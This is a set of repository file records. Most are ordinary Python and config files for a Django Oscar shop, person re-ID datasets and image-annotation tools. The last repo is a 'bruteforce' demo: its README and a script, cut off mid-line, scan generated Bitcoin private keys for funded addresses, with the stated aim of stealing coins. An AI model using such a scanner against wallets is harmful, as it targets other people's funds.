_('Catalogue'),\n 'access_fn': display_menu,\n 'icon': 'icon-sitemap',\n 'children': [\n {\n 'label': _('Products'),\n 'url_name': 'dashboard:catalogue-product-list',\n },\n {\n 'label': _('Product Types'),\n 'url_name': 'dashboard:catalogue-class-list',\n },\n {\n 'label': _('Categories'),\n 'url_name': 'dashboard:catalogue-category-list',\n },\n {\n 'label': _('Ranges'),\n 'url_name': 'dashboard:range-list',\n },\n {\n 'label': _('Low stock alerts'),\n 'url_name': 'dashboard:stock-alert-list',\n },\n ]\n },\n {\n 'label': _('Fulfilment'),\n 'icon': 'icon-shopping-cart',\n 'children': [\n {\n 'label': _('Orders'),\n 'url_name': 'dashboard:order-list',\n },\n {\n 'label': _('Statistics'),\n 'url_name': 'dashboard:order-stats',\n },\n {\n 'label': _('Partners'),\n 'url_name': 'dashboard:partner-list',\n },\n # The shipping method dashboard is disabled by default as it might\n # be confusing. 
Weight-based shipping methods aren't hooked into\n # the shipping repository by default (as it would make\n # customising the repository slightly more difficult).\n # {\n # 'label': _('Shipping charges'),\n # 'url_name': 'dashboard:shipping-method-list',\n # },\n ]\n },\n {\n 'label': _('Customers'),\n 'icon': 'icon-group',\n 'children': [\n {\n 'label': _('Customers'),\n 'url_name': 'dashboard:users-index',\n },\n {\n 'label': _('Stock alert requests'),\n 'url_name': 'dashboard:user-alert-list',\n },\n ]\n },\n {\n 'label': _('Offers'),\n 'icon': 'icon-bullhorn',\n 'children': [\n {\n 'label': _('Offers'),\n 'url_name': 'dashboard:offer-list',\n },\n {\n 'label': _('Vouchers'),\n 'url_name': 'dashboard:voucher-list',\n },\n ],\n },\n {\n 'label': _('Content'),\n 'icon': 'icon-folder-close',\n 'children': [\n {\n 'label': _('Content blocks'),\n 'url_name': 'dashboard:promotion-list',\n },\n {\n 'label': _('Content blocks by page'),\n 'url_name': 'dashboard:promotion-list-by-page',\n },\n {\n 'label': _('Pages'),\n 'url_name': 'dashboard:page-list',\n },\n {\n 'label': _('Email templates'),\n 'url_name': 'dashboard:comms-list',\n },\n {\n 'label': _('Reviews'),\n 'url_name': 'dashboard:reviews-list',\n },\n ]\n },\n {\n 'label': _('Reports'),\n 'icon': 'icon-bar-chart',\n 'url_name': 'dashboard:reports-index',\n },\n {\n 'label': _('PayPal'),\n 'icon': 'icon-globe',\n 'children': [\n {\n 'label': _('PayFlow transactions'),\n 'url_name': 'paypal-payflow-list',\n },\n {\n 'label': _('Express transactions'),\n 'url_name': 'paypal-express-list',\n },\n ]\n },\n]\n" }, { "alpha_fraction": 0.558080792427063, "alphanum_fraction": 0.7171717286109924, "avg_line_length": 17, "blob_id": "2f5015fead5dd056141d556f27230d0b53b6dc0d", "content_id": "77849ea6829887bd0e03119329d7e0ef7e8e88d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 396, "license_type": "no_license", "max_line_length": 26, "num_lines": 22, "path": "/requirements.txt", "repo_name": "halfnibble/oscar-demo", "src_encoding": "UTF-8", "text": "Babel==1.3\nDjango==1.6\nMySQL-python==1.2.5\nPillow==2.4.0\nSouth==0.8.4\nUnidecode==0.04.16\nargparse==1.2.1\ndjango-appconf==0.6\ndjango-compressor==1.3\ndjango-extra-views==0.6.5\ndjango-haystack==2.3.1\ndjango-localflavor==1.0\ndjango-oscar==0.7\ndjango-oscar-paypal==0.9.3\ndjango-treebeard==2.0\nphonenumbers==6.0.0a\npurl==1.0\npytz==2014.7\nrequests==2.4.3\nsix==1.8.0\nsorl-thumbnail==11.12\nwsgiref==0.1.2\n" }, { "alpha_fraction": 0.7185534834861755, "alphanum_fraction": 0.7248427867889404, "avg_line_length": 38.78125, "blob_id": "44a5d898a273036f1d811a1f62b5e293c64ced51", "content_id": "2b44960f8f09d70a58a9d0f53ab037c742ad596a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/bookshop/bookshop/urls.py", "repo_name": "halfnibble/oscar-demo", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom oscar.app import application\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.conf.urls.static import static\n\nfrom apps.app import application\nfrom paypal.payflow.dashboard.app import application as payflow\nfrom paypal.express.dashboard.app import application as 
express_dashboard\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^i18n/', include('django.conf.urls.i18n')),\n url(r'^admin/', include(admin.site.urls)),\n # PayPal Express integration...\n (r'^checkout/paypal/', include('paypal.express.urls')),\n # Dashboard views for Payflow Pro\n (r'^dashboard/paypal/payflow/', include(payflow.urls)),\n # Dashboard views for Express\n (r'^dashboard/paypal/express/', include(express_dashboard.urls)),\n (r'', include(application.urls)),\n)\n\n# This is only needed when using runserver.\nif settings.DEBUG:\n urlpatterns = patterns('',\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', # NOQA\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n ) + staticfiles_urlpatterns() + urlpatterns # NOQA" } ]
3
CGump/dataset-tools
https://github.com/CGump/dataset-tools
465cac35bf25f7ea7133f0bdf1be7387d2dd80ee
086bb6ac6d91e966a112fc21402d5e1a777e907b
818b1b1f9ff032a167168b524dbceb9f381e74a7
refs/heads/master
2020-08-22T18:28:02.280814
2020-05-20T11:30:39
2020-05-20T11:30:39
216,457,233
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5909822583198547, "alphanum_fraction": 0.5974234938621521, "avg_line_length": 22.923076629638672, "blob_id": "e810283a79438a73d0ff5738576937a0767667f6", "content_id": "0bddf933bab43eb060c9030c01e3526d88f55c09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "no_license", "max_line_length": 72, "num_lines": 26, "path": "/voc_xml.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "import os\nimport xml.etree.ElementTree as ET\nfrom os import getcwd\n\nROOT = 'VOCdevkit/VOC2007/'\n\ndef get_name(txt_path):\n with open(txt_path) as f:\n pic_names = f.readlines()\n pic_names = [c.strip() for c in pic_names]\n return pic_names\n\n\n\nif __name__ == \"__main__\":\n image_name = get_name(ROOT+'ImageSets/Main/train.txt')\n print(image_name)\n\n for n in image_name:\n xml_path = os.path.join(ROOT, 'Annotations', '{}.xml'.format(n))\n print(xml_path)\n doc = ET.parse(xml_path)\n root = doc.getroot()\n mything = root.find('name')\n print(mything)\n break" }, { "alpha_fraction": 0.46556776762008667, "alphanum_fraction": 0.47069597244262695, "avg_line_length": 46.08620834350586, "blob_id": "ed5b08579c1bd8032e6dfa60caf2c741e96599c3", "content_id": "1d248d7904de9dbacae51cebb1572a50b3b686f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2814, "license_type": "no_license", "max_line_length": 93, "num_lines": 58, "path": "/auto-image-annotation.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport os, sys\nimport glob\nfrom PIL import Image\n\nclass Auto_ann():\n def __init__(self):\n self.scr_img_dir = \"auto-annotation/img\" # 图像存储路径\n self.scr_xml_dir = \"auto-annotation/xml\" # 标注存储路径\n self.scr_txt_dir = \"auto-annotation/txt\" # 识别结果路径\n self.img_list = glob.glob(self.scr_img_dir + \"/*.jpg\") #[\"1.jpg\",\"2.jpg\"...]\n self.folder = self.scr_img_dir.split('/')[-1]\n self.img_basename = [os.path.basename(item) for item in self.img_list]\n\n def auto_annotation(self):\n for img in self.img_basename:\n width, height = Image.open(self.scr_img_dir + '/' + img).size\n img_name = os.path.splitext(img)[0]\n result_txt = open(self.scr_txt_dir + '/' + img_name + '.txt').read().splitlines()\n\n # 写入xml文件\n xml_file = open((self.scr_xml_dir + '/' + img_name + '.xml'), 'w')\n xml_file.write('<annotation>\\n')\n xml_file.write(' <folder>' + self.folder + '</folder>\\n')\n xml_file.write(' <filename>' + img + '</filename>\\n')\n xml_file.write(' <source>\\n')\n xml_file.write(' <database>Unknown</database>\\n')\n xml_file.write(' </source>\\n')\n xml_file.write(' <size>\\n')\n xml_file.write(' <width>' + str(width) + '</width>\\n')\n xml_file.write(' <height>' + str(height) + '</height>\\n')\n xml_file.write(' <depth>3</depth>\\n')\n xml_file.write(' </size>\\n')\n xml_file.write('\t<segmented>0</segmented>\\n')\n\n # 写入标注信息\n # 标注信息格式:识别名称 置信度 xmin ymin xmax ymax\n for each_label in result_txt:\n spt = each_label.split(' ')\n xml_file.write(' <object>\\n')\n xml_file.write(' <name>' + str(spt[0]) + '</name>\\n')\n xml_file.write(' <pose>Unspecified</pose>\\n')\n xml_file.write(' <truncated>0</truncated>\\n')\n xml_file.write(' <difficult>0</difficult>\\n')\n xml_file.write(' <bndbox>\\n')\n xml_file.write(' <xmin>' + str(spt[2]) + '</xmin>\\n')\n xml_file.write(' <ymin>' + str(spt[3]) + '</ymin>\\n')\n xml_file.write(' <xmax>' + str(spt[4]) + '</xmax>\\n')\n xml_file.write(' 
<ymax>' + str(spt[5]) + '</ymax>\\n')\n xml_file.write(' </bndbox>\\n')\n xml_file.write(' </object>\\n')\n \n xml_file.write('</annotation>')\n xml_file.close()\n\nif __name__ == \"__main__\":\n anno = Auto_ann()\n anno.auto_annotation()" }, { "alpha_fraction": 0.5098404288291931, "alphanum_fraction": 0.5284441113471985, "avg_line_length": 39.85599899291992, "blob_id": "48d3a802c60cc1e54fc0d605f7e65922c8e69cb6", "content_id": "2e0239e25f98f66baa9ca59702307ffb6b54585c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11355, "license_type": "no_license", "max_line_length": 175, "num_lines": 250, "path": "/pick_img.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "import glob\nimport os, shutil\n\nimport numpy as np\nimport xml.etree.ElementTree as ET\nfrom skimage import io, transform\nfrom PIL import Image\n\nimport cv2\n\n\nclass BatchPcik():\n '''\n 批量判断图片维度,并挑出不符合的文件至error文件夹\n !!!error文件夹如果没有可以新建功能!!!\n '''\n def __init__(self):\n self.imgdir_path = \"F:/Fruit_dataset/fresh_fish/\"\n self.xml_path = \"test/\"\n self.error_path = \"test/error/\"\n self.classes = [\"apple\",\"avocado\",\"banana\",\"beefsteak\",\"blueberry\",\"carambola\",\"cherries\",\"chicken\",\"coconut\",\"durian\",\n \"fig\",\"fish\",\"grape\",\"hamimelon\",\"hawthorn\",\"kiwano\",\"kiwi\",\"lemon\",\"litchi\",\"longan\",\"loquat\",\"mango\",\n \"mangosteen\",\"mulberry\",\"muskmelon\",\"orange\",\"pawpaw\",\"peach\",\"pear\",\"pemelo\",\"pepinomelon\",\"persimmon\",\n \"pineapple\",\"pitaya\",\"pomegranate\",\"rambutan\",\"strawberry\",\"watermelon\",\"waxberry\",\"mix\"]\n\n def read_image(self):\n\n w = 100\n h = 100\n c = 3\n path = self.imgdir_path\n cate = [path + x for x in os.listdir(path) if os.path.isdir(path+x)]\n images = []\n labels = []\n for index, folder in enumerate(cate):\n for im in glob.glob(folder + '/*.jpg'):\n img = io.imread(im)\n try:\n if img.shape[2] == c:\n img = transform.resize(img, (w, h))\n images.append(img)\n labels.append(index)\n print(im)\n else:\n print(im, ' IS WRONG')\n except:\n continue\n print('label %d is:' % index, folder)\n return np.asarray(images, np.float32), np.asarray(labels, np.int32)\n\n def find_wrong_pic(self, save_change=\"c\"):\n '''\n 处理非3通道、非RGB图片\n save_change: 为`\"c\"`时change模式,将非3通道、非RGB图片转换为3通道RGB图片\n 为`\"r\"`时remove模式,删除不符合的图片\n 为`\"m\"`时move模式,移动图片至指定文件夹\n '''\n filelist = os.listdir(self.imgdir_path)\n if save_change == \"c\":\n for filename in filelist: \n image_file = Image.open(self.imgdir_path + filename)\n image_file.convert('RGB').save(self.imgdir_path + filename)\n elif save_change == \"r\":\n for filename in filelist:\n os.remove(self.imgdir_path + filename)\n elif save_change == \"m\":\n is_exists = os.path.exists(self.error_path)\n os.makedirs(self.error_path) if not is_exists else print(\"目录已存在\")\n for filename in filelist:\n shutil.move(self.imgdir_path + filename, self.error_path)\n else:\n print(\"the config \\\"save_change\\\" must choose in 'c' or 'r' or 'm'\")\n \n return True\n\n def rename (self, pic_name, batch, i_num):\n '''\n 待修改\n 功能:不同文件夹内图像批量重命名,要求文件夹命名格式一致\n 或者文件夹内重命名,单独某一类\n 以上两者需要可以同时实现,分类选择\n '''\n filelist = os.listdir(self.imgdir_path) #获取文件路径 \n total_num = len(filelist) #获取文件长度(个数) \n i = i_num #表示文件的命名是从1开始的 \n for item in filelist:\n if item.endswith('.jpg'): #初始的图片的格式为jpg格式的(或者源文件是png格式及其他格式,后面的转换格式就可以调整为自己需要的格式即可)\n src = os.path.join(os.path.abspath(self.imgdir_path), item) \n #dst = os.path.join(os.path.abspath(self.imgdir_path), 
''+ '00' str(i) + pic_name + '.jpg') #处理后的格式也为jpg格式的,当然这里可以改成png格式 \n dst = os.path.join(os.path.abspath(self.imgdir_path), pic_name + '_' + batch + '_' + format(str(i), '0>4s') + '.jpg') #这种情况下的命名格式为0000000.jpg形式,可以自主定义想要的格式 \n try: \n os.rename(src, dst) \n print ('converting %s to %s ...' % (src, dst)) \n i = i + 1\n except: \n continue\n print ('total %d to rename & converted %d jpgs' % (total_num, i))\n\n def rename_batch (self, batch, suffix='.jpg', i_num=1):\n '''\n 数据集名称中标签项修改,例如: \n apple_01_0001.jpg -> apple_04_0001.jpg \n apple_01_0001.xml -> apple_04_0001.xml \n batch: 修改后的批次名称 \n suffix: 文件的后缀名 \n i_num: 文件的序号 \n '''\n filelist = os.listdir(self.imgdir_path) # 获取文件路径 \n for filename in filelist:\n pic_1, _, pic_3 = filename.split('_') # 获取文件名,序号+后缀\n if (pic_1 in self.classes) and filename.endswith(suffix): \n src = os.path.join(os.path.abspath(self.imgdir_path), filename) \n dst = os.path.join(os.path.abspath(self.imgdir_path), pic_1 + '_' + batch + '_' + pic_3)\n try: \n os.rename(src, dst) \n print ('converting %s to %s ...' % (src, dst)) \n i_num = i_num + 1\n except: \n continue\n print ('total %d to rename & converted %d jpgs' % (len(filelist), i_num-1))\n\n def rename_dataset(self, batch, suffix='.jpg', xml_suffix='.xml'):\n '''\n 修改数据集批次信息,包括图片名和xml标注文件名,以及标注文件内的图片名和图片路径\n apple_01_0001.jpg -> apple_04_0001.jpg \n apple_01_0001.xml -> apple_04_0001.xml \n batch:`str`,修改后的批次号\n suffix:图像的后缀名,默认为`.jpg`\n xml_suffix:标注文件后缀名,默认为`.xml`\n '''\n filelist = os.listdir(self.imgdir_path) # 获取文件路径 \n for filename in filelist:\n # filename已知 filename=\"apple_01_0001.jpg\" 修改前\n pic_1, _, pic_3 = filename.split('_') # apple 01 0001.jpg\n seach_name = filename.split('.')[0] # 用来索引xml文件的apple_01_0001\n new_pic_name = pic_1 + '_' + batch + '_' + pic_3 # 新名字apple_04_0001.jpg\n xml_name = seach_name + xml_suffix # xml_name 此时为修改前 apple_01_0001.xml\n xml_1, _, xml_3 = xml_name.split('_') # 提取出来后:apple 01 0001.xml\n new_xml_name = xml_1 + '_' + batch + '_' + xml_3 # 重新组合批次信息,apple_04\n\n if (pic_1 in self.classes) and filename.endswith(suffix):\n src = os.path.join(os.path.abspath(self.imgdir_path), filename)\n dst = os.path.join(os.path.abspath(self.imgdir_path), new_pic_name)\n src_xml = os.path.join(os.path.abspath(self.xml_path), xml_name)\n dst_xml = os.path.join(os.path.abspath(self.xml_path), new_xml_name)\n\n doc = ET.parse(self.xml_path + xml_name)\n root = doc.getroot()\n root.find(\"filename\").text = new_pic_name\n root.find(\"path\").text = self.imgdir_path + new_pic_name\n doc.write(self.xml_path + xml_name)\n\n try:\n os.rename(src, dst)\n os.rename(src_xml, dst_xml)\n print(\"---filename:%s has been modified---\"%(filename))\n except:\n continue\n\n def change_xml_all(self, suffix='.jpg'):\n '''\n 修改xml文件中的filename和path \n xml文件的文件名与其内部filename和path不对应 \n 通过xml文件名提取信息,拼装`.jpg`后缀即可\n suffix:默认后缀为`.jpg`\n '''\n filelist = os.listdir(self.xml_path)\n for xmlfile in filelist:\n doc = ET.parse(self.xml_path + xmlfile)\n root = doc.getroot()\n alter1 = root.find('filename')\n alter1.text = xmlfile.split('.')[0] + suffix\n\n alter2 = root.find('path')\n alter2.text = alter2.text.rsplit('\\\\', 1)[0] + '\\\\' + xmlfile.split('.')[0] + suffix\n doc.write(self.xml_path + xmlfile)\n print(\"---done---\")\n\n def get_train_name(self, write_path, suffix='.jpg'):\n '''\n 读取数据集中所有图像的名称,并写入文本文件\n write_path:文本文件的存放路径\n '''\n filelist = os.listdir(self.imgdir_path)\n filelist.sort() # 原地修改\n f = open(write_path, 'w')\n for filename in filelist:\n if filename.endswith(suffix):\n write_name 
= filename.split('.')[0] + '\\n'\n f.write(write_name)\n f.close()\n\nif __name__ == \"__main__\":\n demo = BatchPcik()\n #demo.error_path = \"F:/Fruit_dataset/pick_img/error_img/\"\n key = 2\n if key == 1 :\n # 测试修改批次号方法\n demo.imgdir_path = \"E:/fruit_server/VOCdevkit/VOC2007/Annotations/\"\n demo.classes = [\"apple\"]\n batch = \"04\"\n demo.rename_batch(batch, suffix='.xml') \n elif key == 2:\n #demo.classes = [\"apple\", \"avocado\", \"broccoli\", \"carrot\", \"chinese-cabbage\", \"coconut\",\n # \"corn\", \"hami-melon\", \"lemon\", \"mix\" ,\"onion\", \"orange\", \"pear\", \n # \"pomegranate\", \"pomelo\", \"sweet-potato\"]\n demo.classes = [\"hami-melon\"]\n for class_name in demo.classes:\n demo.imgdir_path = 'E:/fruit_server/15/%s'%(class_name) \n demo.rename(class_name, batch='05', i_num=1)\n elif key == 3:\n demo.xml_path = \"E:/fruit_server/VOCdevkit/VOC2007/Annotations/\"\n demo.change_xml_all()\n elif key == 4:\n # 同时修改图片名,标注名和标注信息内的图片名、图片地址\n demo.imgdir_path = \"E:/fruit_server/VOCdevkit/VOC2007/JPEGImages/\"\n demo.xml_path = \"E:/fruit_server/VOCdevkit/VOC2007/Annotations/\"\n demo.classes = [\"apple\",\"kiwi\",\"mango\",\"mangosteen\",\"mix\",\"orange\",\"pear\",\"peach\",\"pomegranate\"]\n demo.rename_dataset(\"04\")\n elif key == 5:\n demo.imgdir_path = \"VOC2007/JPEGImages/\"\n write_path = \"VOC2007/ImageSets/Main/train.txt\"\n demo.get_train_name(write_path)\n \n elif key == 6:\n demo.imgdir_path = \"test/error_img/\"\n demo.find_wrong_pic(save_change='m')\n\n elif key == 10:\n classes.append('mix')\n for class_name in classes:\n dirpath = \"F:/Fruit_dataset/yolo_39class/test_image/%s\"%(class_name)\n os.makedirs(dirpath)\n print(\"New folder has been done!-->\" + dirpath)\n else:\n # 测试集制作\n classes.append('mix')\n for class_name in classes:\n batch = 'test'\n i_num = 1\n demo.imgdir_path = \"F:/Fruit_dataset/yolo_39class/test_image/%s/\"%(class_name)\n demo.find_wrong_pic()\n demo.rename(class_name, batch, i_num) \n \n '''\n else:\n demo.imgdir_path = \"F:/Fruit_dataset/meat_train/test/\"\n data, label = demo.read_image()\n print(data.shape) \n '''" }, { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 13.5, "blob_id": "170e2723d78b2fc6242cb8dc1dfb3466c7cd9407", "content_id": "b3d8a1a01852721cb2f8e97a33d68fb0a6835760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 15, "num_lines": 2, "path": "/README.md", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "# dataset-tools\n 一些处理数据集的小工具\n" }, { "alpha_fraction": 0.5985184907913208, "alphanum_fraction": 0.6118518710136414, "avg_line_length": 21.433332443237305, "blob_id": "9276644767ec9d1787b69edc22b536f7febc147c", "content_id": "bc6e3aa83a7e5685acc14d899e7066fb53afc612", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 52, "num_lines": 30, "path": "/voc_tool.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "import os \nimport random \n\nroot = 'VOCdevkit/VOC2007/'\ntrain = 0.9 \nval = 0.1 \nxmlfilepath = root + 'Annotations' \ntxtsavepath = root + 'ImageSets/Main' \ntotal_xml = os.listdir(xmlfilepath) \n \nnum = len(total_xml) \nlist = range(num) \ntv = int(num * train) \ntrain_num = random.sample(list, tv) \n \nftrainval = open(txtsavepath+'/trainval.txt', 'w') \nftrain = open(txtsavepath+'/train.txt', 
'w') \nfval = open(txtsavepath+'/val.txt', 'w') \n\nfor i in list: \n name=total_xml[i][:-4]+'\\n' \n ftrainval.write(name)\n if i in train_num: \n ftrain.write(name) \n else: \n fval.write(name) \n \nftrainval.close() \nftrain.close() \nfval.close() \n" } ]
5
wangguanan/fast-reid
https://github.com/wangguanan/fast-reid
320a28a8e20de6ee6075391774bd776d678d2c5c
7e2bc6873fadd320cdd4c0077dad5c7f1a94218e
ab3d7e6c38c7dbdc876cecaac3d7a6a6e9f882d7
refs/heads/master
2022-12-08T14:55:03.463977
2020-09-08T03:14:05
2020-09-08T03:14:05
285,167,273
2
0
null
2020-08-05T03:22:56
2020-08-04T11:50:09
2020-08-04T08:00:23
null
[ { "alpha_fraction": 0.730983316898346, "alphanum_fraction": 0.7486085295677185, "avg_line_length": 27.135135650634766, "blob_id": "e99241e1c4a515149ebb8764d399b0fdac653e88", "content_id": "80e7467bfe74db80227a3cf9ffc242a2a98393b4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1078, "license_type": "permissive", "max_line_length": 87, "num_lines": 37, "path": "/fastreid/data/datasets/__init__.py", "repo_name": "wangguanan/fast-reid", "src_encoding": "UTF-8", "text": "# encoding: utf-8\r\n\"\"\"\r\n@author: liaoxingyu\r\n@contact: [email protected]\r\n\"\"\"\r\n\r\nfrom ...utils.registry import Registry\r\n\r\nDATASET_REGISTRY = Registry(\"DATASET\")\r\nDATASET_REGISTRY.__doc__ = \"\"\"\r\nRegistry for datasets\r\nIt must returns an instance of :class:`Backbone`.\r\n\"\"\"\r\n\r\n# Person re-id datasets\r\nfrom .cuhk03 import CUHK03\r\nfrom .dukemtmcreid import DukeMTMC\r\nfrom .market1501 import Market1501\r\nfrom .msmt17 import MSMT17\r\nfrom .AirportALERT import AirportALERT\r\nfrom .iLIDS import iLIDS\r\nfrom .pku import PKU\r\nfrom .prai import PRAI\r\nfrom .sensereid import SenseReID\r\nfrom .sysu_mm import SYSU_mm\r\nfrom .thermalworld import Thermalworld\r\nfrom .pes3d import PeS3D\r\nfrom .caviara import CAVIARa\r\nfrom .viper import VIPeR\r\nfrom .lpw import LPW\r\nfrom .shinpuhkan import Shinpuhkan\r\n# Vehicle re-id datasets\r\nfrom .veri import VeRi\r\nfrom .vehicleid import VehicleID, SmallVehicleID, MediumVehicleID, LargeVehicleID\r\nfrom .veriwild import VeRiWild, SmallVeRiWild, MediumVeRiWild, LargeVeRiWild\r\n\r\n__all__ = [k for k in globals().keys() if \"builtin\" not in k and not k.startswith(\"_\")]\r\n" } ]
1
yadav-sachin/profQuest
https://github.com/yadav-sachin/profQuest
5c12b4c1bbf867fd213dd680093736f00ccba900
7980a8c17726761d007cf134a587569ca2c035ea
79d46aa964f6f21417497206209af7bf244ae4a1
refs/heads/main
2023-04-20T07:44:23.533699
2021-05-11T01:57:43
2021-05-11T01:57:43
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7662337422370911, "alphanum_fraction": 0.7662337422370911, "avg_line_length": 5.900000095367432, "blob_id": "08f15e8f97d54c5cb5055c5b129133f5187f7e24", "content_id": "3596b33fb7a47c0f387513f1d314a3f612e8397c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 77, "license_type": "no_license", "max_line_length": 9, "num_lines": 10, "path": "/requirements.txt", "repo_name": "yadav-sachin/profQuest", "src_encoding": "UTF-8", "text": "scrapy\r\njsonlines\r\nflask\r\nnltk\r\nsklearn\r\npickle\r\nscipy\r\ndifflib\r\nheapq\r\nnumpy" }, { "alpha_fraction": 0.6719056963920593, "alphanum_fraction": 0.673870325088501, "avg_line_length": 32.93333435058594, "blob_id": "814c1e1440bad5641584f3f6d1c2cade17ea7989", "content_id": "3edd403b6f8077b5d40f758b19e20a7b1c4e9fea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 130, "num_lines": 15, "path": "/trash/html_data_exists?.py", "repo_name": "yadav-sachin/profQuest", "src_encoding": "UTF-8", "text": "from os import listdir\nfrom os.path import isfile, join\nimport jsonlines\ncountry = \"india\"\n# country = input()\nhtml_files = [f for f in listdir(\"data/output_data/{}\".format(country)) if isfile(join(\"data/output_data/{}\".format(country), f))]\nhtml_file_names = [name.split('.')[0] for name in html_files]\n\n\nwith jsonlines.open('oup_{}.jl'.format(country)) as reader:\n for obj in reader:\n if obj['user'] in html_file_names:\n html_file_names.remove(obj['user'])\n\nprint(len(html_file_names))\n" } ]
2
TheZ3ro/bitcoin-privkey-bruteforce
https://github.com/TheZ3ro/bitcoin-privkey-bruteforce
d01732ff9b7d6c79d983b7e8b354a2888dc6cb77
05d2c275dca25e5ff0c232037ac6229acaced4d7
02c75d49740afb88b58b9d5296bd131c4136247e
refs/heads/master
2016-09-07T11:04:39.113182
2014-11-19T13:10:51
2014-11-19T13:10:51
26,860,756
3
2
null
null
null
null
null
[ { "alpha_fraction": 0.6629955768585205, "alphanum_fraction": 0.7466960549354553, "avg_line_length": 35.31999969482422, "blob_id": "0c4ad5996eeb97708de694721b5705fde2188507", "content_id": "1ca38f32e97feef54f76ce2dc58cb7b26e82d3b4", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 908, "license_type": "permissive", "max_line_length": 116, "num_lines": 25, "path": "/README.md", "repo_name": "TheZ3ro/bitcoin-privkey-bruteforce", "src_encoding": "UTF-8", "text": "bitcoin-privkey-bruteforce\n==========================\n\nDemo for a Bruteforce on the Bitcoin Address Privkey\n\nDeveloped for Fun\n\nThe script (btcscan.py) takes a vanitygen's log file and parse it to check the\nbalance of the generated addresses.\n\nExecute vanitygen like this:\n```vanitygen 1 -ko <filename>```\n\nthen after some (thousand) match execute btcscan.py:\n```./btcscan.py <filename> >> a.log```\n\nIf it's found an address with some balance the script will print out the key and the BTC ammount\nso we can steal some Bitcoin.\n\nIf my calculation aren't wrong:\nWe have ```58^34 => 904798310844700775313327215140493940623303545877497699631104```\npossible Bitcoin adressed (1 base58 char for 34 position in the address) and the daily\nnumber of address used is ~170000 (source [blockchain.info](https://blockchain.info/it/charts/n-unique-addresses) )\n\nSo, If you think you can steal some BTC, you are a fool :D\n" }, { "alpha_fraction": 0.6623443961143494, "alphanum_fraction": 0.6856846213340759, "avg_line_length": 25.410959243774414, "blob_id": "2038eb2b61253135f565490af563989bbe61f97c", "content_id": "469570549aa935c4451d737cca8b95cc6a24b555", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "permissive", "max_line_length": 91, "num_lines": 73, "path": "/btcscan.py", "repo_name": "TheZ3ro/bitcoin-privkey-bruteforce", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#TheZero\n#This code is under Public Domain\n\nimport sys\nimport urllib2\nimport json\nfrom threading import Thread\nfrom time import sleep\nthreads = []\njackpot = []\naddr=\"\"\nn=0\n\n# http://bitcoin-abe.info/chain/Bitcoin/q/addressbalance/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC\n# -direct integer response\n# http://blockchain.info/address/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC?format=json\n# -json_data[\"final_balance\"]\n# http://btc.blockr.io/api/v1/address/info/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC\n# -json_data[\"data\"][\"balance\"]\n# http://webbtc.com/address/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC.json\n# -json_data[\"balance\"]\n# https://mainnet.helloblock.io/v1/addresses/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC\n# -json_data[\"data\"][\"address\"][\"balance\"]\n\ndef scan(address,pkey): \n\treq = urllib2.Request(\"http://btc.blockr.io/api/v1/address/info/\"+address+\"\")\n\tres = urllib2.urlopen(req)\n\tjson_data = json.load(res)\n\t#print address+\" \"+pkey+\" \"+str(json_data[\"data\"][\"balance\"])\n\tif json_data[\"data\"][\"balance\"]>=0.01:\n\t\tprint address+\" \"+pkey+\" \"+str(json_data[\"data\"][\"balance\"])\n\t\tjackpot.append(address+\" \"+pkey+\" \"+str(json_data[\"data\"][\"balance\"]))\n\nif len(sys.argv)!=2:\n\texit()\n\ntry:\n\tf = open(sys.argv[1], \"r\")\n\ttry:\n\t\t# read all the lines into a list.\n\t\tlines = f.readlines()\n\tfinally:\n\t\tf.close()\nexcept IOError:\n\tpass\n\nfor line in lines:\n\tif line.startswith(\"Address: \"):\n\t\taddr=line[9:-1]\n\tif 
